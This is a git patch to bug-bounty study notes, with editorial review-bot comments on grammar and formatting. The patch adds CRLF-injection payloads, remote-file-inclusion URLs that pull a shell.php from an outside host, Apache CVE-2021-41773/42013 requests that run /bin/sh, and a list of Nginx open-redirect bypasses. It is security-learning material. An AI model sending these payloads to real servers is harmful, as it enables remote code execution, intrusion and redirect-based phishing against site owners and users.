From abd025fb643e97d23d2d3bee997fc7f634522a4d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Wed, 22 Jun 2022 11:41:21 +0700 Subject: [PATCH] Add 'Where to find' in each readme, add Apache + CRLF + RFI --- Arbitrary File Upload.md | 12 ++++++-- Business Logic Errors.md | 5 +++- Bypass/Bypass Captcha.md | 2 +- CRLF Injection.md | 35 +++++++++++++++++++++++ Cross Site Request Forgery.md | 8 +++++- Cross Site Scripting.md | 5 +++- Denial Of Service.md | 5 +++- Exposed Source Code.md | 5 +++- Host Header Injection.md | 3 ++ Insecure Direct Object References.md | 6 +++- Local File Inclusion.md | 5 +++- OAuth Misconfiguration.md | 5 +++- Open Redirect.md | 6 +++- README.md | 5 +++- Remote File Inclusion.md | 31 ++++++++++++++++++++ Technologies/Apache HTTP Server.md | 42 ++++++++++++++++++++++++++++ Technologies/Confluence.md | 4 +-- Technologies/HAProxy.md | 2 +- Technologies/Jira.md | 5 +--- Technologies/Nginx.md | 38 +++++++++++++++++++++++-- Technologies/Zend.md | 2 +- Web Cache Poisoning.md | 5 +++- 22 files changed, 211 insertions(+), 25 deletions(-) create mode 100644 CRLF Injection.md create mode 100644 Remote File Inclusion.md create mode 100644 Technologies/Apache HTTP Server.md diff --git a/Arbitrary File Upload.md b/Arbitrary File Upload.md index 57f6bd3..8d247dc 100644 --- a/Arbitrary File Upload.md +++ b/Arbitrary File Upload.md @@ -1,5 +1,13 @@ -# Bypass File Upload -1. Change the ContentType +# Arbitrary File Upload + +## Introduction +An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server. + +## Where to find +In upload file feature, for example upload photo profile feature + +## How to exploit +1. Change the `Content-Type` value ``` POST /images/upload/ HTTP/1.1 Host: target.com diff --git a/Business Logic Errors.md b/Business Logic Errors.md index 9249590..72d8784 100644 --- a/Business Logic Errors.md +++ b/Business Logic Errors.md 
@@ -3,7 +3,10 @@ ## Introduction Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. -## How to find +## Where to find +This vulnerability can appear in all features of the application. + +## How to exploit 1. Review Functionality - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. diff --git a/Bypass/Bypass Captcha.md b/Bypass/Bypass Captcha.md index 29ed221..e2dbfc3 100644 --- a/Bypass/Bypass Captcha.md +++ b/Bypass/Bypass Captcha.md @@ -1,4 +1,4 @@ -# Bypass Captcha +# Bypass Captcha (Google reCAPTCHA) 1. Try changing the request method, for example POST to GET ``` diff --git a/CRLF Injection.md b/CRLF Injection.md new file mode 100644 index 0000000..ba63281 --- /dev/null +++ b/CRLF Injection.md 
@@ -0,0 +1,35 @@ +# CRLF Injection + +## Introduction +A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. + +## Where to find +It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308). + +## How to exploit +1. Basic payload +``` +https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/ +``` +The response is +``` +HTTP/1.1 200 OK +Content-Type: text/html +Date: Mon, 09 May 2016 14:47:29 GMT +Set-Cookie: language=en +Location: https://evil.com/ +``` + +2. Double encode +``` +https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/ +``` + +3. Bypass unicode +``` +https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/ +``` + +## References +* [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/) +* [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md) \ No newline at end of file diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index 5726e5e..dd458c4 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -3,6 +3,9 @@ ## Introduction Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated +## How to find +Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) + ## How to exploit 1. HTML GET Method 
@@ -37,4 +40,7 @@ xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xhr.send('{"role":admin}'); -``` \ No newline at end of file +``` + +5. Multipart request +Soon \ No newline at end of file diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 8005eb4..cbccd0d 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -12,7 +12,10 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s A type of XSS that has payloads found in the DOM rather than within the HTML code. -## **How to exploit** +## Where to find +This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code. + +## How to exploit 1. Basic payload ```html diff --git a/Denial Of Service.md b/Denial Of Service.md index c75adda..1b87ad6 100644 --- a/Denial Of Service.md +++ b/Denial Of Service.md @@ -2,8 +2,11 @@ ## Introduction Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it -## How to FInd +## Where to find +This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files + +## How to exploit 1. Cookie bomb ``` diff --git a/Exposed Source Code.md b/Exposed Source Code.md index 2360b4c..a5d0932 100644 --- a/Exposed Source Code.md +++ b/Exposed Source Code.md @@ -3,7 +3,10 @@ ## Introduction Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. -## How to FInd +## Where to find +`-` + +## How to exploit 1. Exposed Git folder ``` https://site.com/.git 
diff --git a/Host Header Injection.md b/Host Header Injection.md index d224674..cd7d4b6 100644 --- a/Host Header Injection.md +++ b/Host Header Injection.md @@ -3,6 +3,9 @@ ## Introduction HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. +## Where to find +In the feature where the website can send email to us. For example forgot password / newsletter. + ## How to exploit 1. Change the host header ``` diff --git a/Insecure Direct Object References.md b/Insecure Direct Object References.md index 8e4b3ca..46bdd1a 100644 --- a/Insecure Direct Object References.md +++ b/Insecure Direct Object References.md @@ -3,7 +3,11 @@ ## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. -## How to FInd +## Where to find +- Usually it can be found in APIs. +- Check the HTTP request that contain unique ID, for example `user_id` or `id` + +## How to exploit 1. Add parameters onto the endpoints for example, if there was ``` GET /api/v1/getuser diff --git a/Local File Inclusion.md b/Local File Inclusion.md index 86287bb..dd1c239 100644 --- a/Local File Inclusion.md +++ b/Local File Inclusion.md 
@@ -1,8 +1,11 @@ -## Local File Inclusion +## Local File Inclusion (LFI) ## Introduction Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server +## Where to find +- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` + ## How to exploit 1. Basic payload ``` diff --git a/OAuth Misconfiguration.md b/OAuth Misconfiguration.md index 8655650..bb50ba4 100644 --- a/OAuth Misconfiguration.md +++ b/OAuth Misconfiguration.md @@ -3,7 +3,10 @@ ## Introduction The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. -## How to find +## Where to find +In the SSO feature. For example `Log in with google` or `Log in with facebook`. + +## How to exploit 1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses). 2. Change Referral header to attacker.com while requesting OAuth. 3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. diff --git a/Open Redirect.md b/Open Redirect.md index 621fce3..0493ca7 100644 --- a/Open Redirect.md +++ b/Open Redirect.md @@ -3,7 +3,11 @@ ## Introduction Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain -## How to Find +## Where to find +- Sometimes it can be found in login / register / logout pages +- Checking the javascript source code + +## How to exploit 1. Try change the domain ``` /?redir=evil.com 
diff --git a/README.md b/README.md index 1c6bafe..2d4d248 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ## List - [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) +- [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) @@ -17,9 +18,10 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) -- SQL Injection (SOON) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) +- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md) +- SQL Injection (SOON) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) ## List Bypass 
@@ -41,6 +43,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) ## Technologies +- [Apache (HTTP Server)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Apache%20HTTP%20Server.md) - [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md) - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) diff --git a/Remote File Inclusion.md b/Remote File Inclusion.md new file mode 100644 index 0000000..9a5aad0 --- /dev/null +++ b/Remote File Inclusion.md @@ -0,0 +1,31 @@ +## Remote File Inclusion (RFI) + +## Introduction +Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. + +## Where to find +- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` + +## How to exploit +1. Basic payload +``` +http://example.com/index.php?page=http://daffa.info/shell.php +``` + +2. URL encoding +``` +http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php +``` + +3. Double encoding +``` +http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php +``` + +4. Using Null Byte (%00) +``` +http://example.com/index.php?page=http://daffa.info/shell.php%00 +``` + +## References +* [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list) \ No newline at end of file diff --git a/Technologies/Apache HTTP Server.md b/Technologies/Apache HTTP Server.md new file mode 100644 index 0000000..0bd98ed --- /dev/null +++ b/Technologies/Apache HTTP Server.md 
@@ -0,0 +1,42 @@ +# Apache (HTTP Server) Common Bugs + +## Introduction +What would you do if you came across a website that uses Apache (HTTP Server)? + +## How to Detect +Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page + +1. Find the related CVE by checking Apache (HTTP Server) version +* How to find the Apache (HTTP Server) version + +By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html) + +Some example CVE: + +- CVE-2021-41773 (RCE and LFI) +``` +POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: */* +Content-Length: 7 +Content-Type: application/x-www-form-urlencoded +Connection: close + +echo;id +``` +- CVE-2021-42013 (RCE and LFI) +``` +POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 7 + +echo;id +``` \ No newline at end of file diff --git a/Technologies/Confluence.md b/Technologies/Confluence.md index 23033c6..9aeac04 100644 --- a/Technologies/Confluence.md +++ b/Technologies/Confluence.md 
@@ -4,9 +4,7 @@ What would you do if you came across a website that uses Confluence? ## How to Detect -``` -https://example.com/login.action?os_destination=%2F -``` +Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login 1. Find the related CVE by checking Confluence version * How to find the Confluence version diff --git a/Technologies/HAProxy.md b/Technologies/HAProxy.md index 3471bd6..041dc56 100644 --- a/Technologies/HAProxy.md +++ b/Technologies/HAProxy.md @@ -4,7 +4,7 @@ What would you do if you came across a website that uses HAProxy? ## How to Detect -- +`-` 1. CVE-2021-40346 (HTTP Request Smuggling) ``` diff --git a/Technologies/Jira.md b/Technologies/Jira.md index e6b19fb..6c3cc0e 100644 --- a/Technologies/Jira.md +++ b/Technologies/Jira.md @@ -4,10 +4,7 @@ What would you do if you came across a website that uses Jira? ## How to Detect -``` -https://example.com/secure/Dashboard.jspa -https://example.com/login.jsp -``` +Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login 1. Find the related CVE by checking jira version * How to find the jira version diff --git a/Technologies/Nginx.md b/Technologies/Nginx.md index 93d0fdc..129ed21 100644 --- a/Technologies/Nginx.md +++ b/Technologies/Nginx.md 
@@ -21,7 +21,41 @@ https://example.com/folder1/folder2/static../static/main.css https://example.com/folder1/folder2/static../%s/main.css ``` -3. Nginx status page +3. Open redirect +This is because of misconfiguration +``` +https://example.com/%5cevil.com +https://example.com////\;@evil.com +https://example.com////evil.com +https://example.com///evil.com +https://example.com///evil.com/%2f%2e%2e +https://example.com///evil.com@// +https://example.com///{{RootURL}}evil.com/%2f%2e%2e +https://example.com//;@evil.com +https://example.com//\/evil.com/ +https://example.com//\@evil.com +https://example.com//\evil.com +https://example.com//\tevil.com/ +https://example.com//evil.com/%2F.. +https://example.com//evil.com// +https://example.com//evil.com@// +https://example.com//evil.com\tevil.com/ +https://example.com//https://evil.com@// +https://example.com/<>//evil.com +https://example.com/\/\/evil.com/ +https://example.com/\/evil.com +https://example.com/\evil.com +https://example.com/evil.com +https://example.com/evil.com/%2F.. +https://example.com/evil.com/ +https://example.com/evil.com/..;/css +https://example.com/https:evil.com +``` + +4. Nginx status page ``` https://example.com/nginx_status -``` \ No newline at end of file +``` + +## References +- [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) \ No newline at end of file diff --git a/Technologies/Zend.md b/Technologies/Zend.md index 048dbe8..03ea8d3 100644 --- a/Technologies/Zend.md +++ b/Technologies/Zend.md @@ -4,7 +4,7 @@ What would you do if you came across a website that uses Zend? ## How to Detect -- +`-` 1. Finding config files ``` diff --git a/Web Cache Poisoning.md b/Web Cache Poisoning.md index da1ba97..16bb39c 100644 --- a/Web Cache Poisoning.md +++ b/Web Cache Poisoning.md 
@@ -3,7 +3,10 @@ ## Introduction The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. -## How to FInd +## Where to find +`-` + +## How to exploit 1. Basic poisoning ``` GET / HTTP/1.1
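Review bot: The new "Where to find" sentence in the `Arbitrary File Upload.md` hunk, "In upload file feature, for example upload photo profile feature", is ungrammatical; suggest "In any file upload feature, for example a profile photo upload." The title rename from "Bypass File Upload" and the backticked `Content-Type` in step 1 are fine.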
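Review bot: In the new `CRLF Injection.md`, the sample response under "1. Basic payload" shows `HTTP/1.1 200 OK` together with the injected `Location:` header, while "Where to find" tells the reader to look for 301/302/303/307/308 responses; either show a 3xx status line in the sample or add one sentence saying the injected header, not the status code, is the indicator. Also reword "you can see the response is (301, 302, 303, 307, 308)" to "the response status is 301, 302, 303, 307 or 308", rename "3. Bypass unicode" to "3. Unicode bypass" with a pointer to the [@filedescriptor] reference that explains those bytes, and add the missing newline at end of file.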
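Review bot: The first `Cross Site Request Forgery.md` hunk adds `## How to find`, but the commit subject and every other file in this patch use `## Where to find`; rename it for consistency. In the same paragraph, "Try submit the form" should read "Try submitting the form" and "try check this [List]" should read "check this [List]".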
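Review bot: The second `Cross Site Request Forgery.md` hunk (`@@ -37,4 +40,7 @@`) ships "5. Multipart request" with only "Soon" under it; either leave the empty section out of this commit or mark it the way the README does ("(SOON)") so readers do not expect content. Unrelated to the change but visible in the context lines, `xhr.send('{"role":admin}')` is not valid JSON because `admin` is unquoted; if a JSON body is intended it should be `'{"role":"admin"}'`.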
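Review bot: In the `Cross Site Scripting.md` hunk, "Dom-based XSS" should be "DOM-based XSS" and "javascript source code" should be "JavaScript source code". Dropping the bold markup from the `## How to exploit` heading is a good cleanup.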
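Review bot: The `Denial Of Service.md` sentence "Depending on how to exploit it, for example in the file upload feature, you can upload very large files" is hard to parse; suggest "Where it appears depends on the technique, for example a file upload feature that accepts very large files." Replacing the misspelled `## How to FInd` heading is welcome.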
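Review bot: The `Exposed Source Code.md` hunk adds a `## Where to find` section whose only body is a code-formatted `-`, which renders as a literal dash and tells the reader nothing; the exploit step visible right below it ("1. Exposed Git folder", `https://site.com/.git`) already gives a concrete location, so suggest "Exposed version-control folders and backup files, for example `/.git`" or drop the section until there is text.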
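Review bot: In the `Host Header Injection.md` hunk, "In the feature where the website can send email to us. For example forgot password / newsletter." should read "In features that email the user a link, for example password reset or newsletter sign-up."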
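Review bot: In the `Insecure Direct Object References.md` hunk, "Check the HTTP request that contain unique ID" should read "Check HTTP requests that contain a unique ID, for example `user_id` or `id`".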
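Review bot: The `Local File Inclusion.md` hunk edits the title line but keeps it at `## Local File Inclusion (LFI)`, while the other titles touched in this patch (`# Arbitrary File Upload`, `# CRLF Injection`) use a single `#`; since the line is being changed anyway, promote it to `#` so the title and the `## Introduction` section are not at the same level.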
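Review bot: In the `OAuth Misconfiguration.md` hunk, "In the SSO feature. For example `Log in with google` or `Log in with facebook`." should read "In single sign-on features, for example `Log in with Google` or `Log in with Facebook`."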
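Review bot: The two "Where to find" bullets in the `Open Redirect.md` hunk are not parallel ("Sometimes it can be found in login / register / logout pages" vs. "Checking the javascript source code"); suggest "In login, register and logout pages" and "In JavaScript source code that builds a redirect target".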
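Review bot: In the new `Remote File Inclusion.md`, the "Where to find" bullet is copied verbatim from LFI ("includes a file from a web server"), but the RFI case is a parameter whose value is fetched as a URL; say so, since the example `/index.php?page=index.html` alone does not distinguish the two. The four payloads point at `daffa.info/shell.php`, a real-looking host; a reserved name such as `attacker.example` keeps readers from contacting a live domain. Also promote the title from `##` to `#` and add the missing newline at end of file.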
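Review bot: In the new `Technologies/Apache HTTP Server.md`, the numbered step "1. Find the related CVE by checking Apache (HTTP Server) version" and the two CVE request samples sit under `## How to Detect` with no further heading, unlike the other files in this patch that separate detection from exploitation; add a heading before step 1. The detection sentence "Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page" is a run-on; suggest "The `Server` header (for example `Server: Apache` or `Server: Apache/2.4.50`) and the default 404 page usually reveal it." Next to CVE-2021-41773 and CVE-2021-42013, state the affected versions so a reader can triage from the version string instead of firing the sample requests, and add the missing newline at end of file.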
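Review bot: In the `Technologies/Confluence.md` hunk, "Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login" is ungrammatical; suggest "Request `https://example.com/login.action?os_destination=%2F`; a login form in the response indicates Confluence."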
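Review bot: In the `Technologies/HAProxy.md` hunk, changing `-` to `` `-` `` only makes the placeholder render as inline code; the "How to Detect" section still says nothing. Leave it as plain text or write a sentence.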
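Review bot: Same wording problem in the `Technologies/Jira.md` hunk: "Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login" should read "Request `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp`; a login form in the response indicates Jira."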
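Review bot: In the `Technologies/Nginx.md` hunk, the entry `https://example.com///{{RootURL}}evil.com/%2f%2e%2e` contains a scanner-template variable, not a literal URL, and the entries with `\t` are ambiguous between a tab character and the two characters backslash-t; clarify or remove them. "This is because of misconfiguration" is too vague to act on; name the directive at fault or point the reader to the [Detectify] reference added at the bottom. The new `## References` list uses `-` while `CRLF Injection.md` and `Remote File Inclusion.md` in this same patch use `*`; pick one.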
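Review bot: As in the HAProxy hunk, the `Technologies/Zend.md` change from `-` to `` `-` `` leaves "How to Detect" empty; the step visible below it ("1. Finding config files") suggests at least a one-line hint about exposed config files.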
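Review bot: The `Web Cache Poisoning.md` hunk adds a `## Where to find` section whose body is the code-formatted placeholder `-`; either write a sentence (the "1. Basic poisoning" step below already starts from a cached `GET /`) or omit the section until it has content. Fixing the `## How to FInd` typo by renaming is fine.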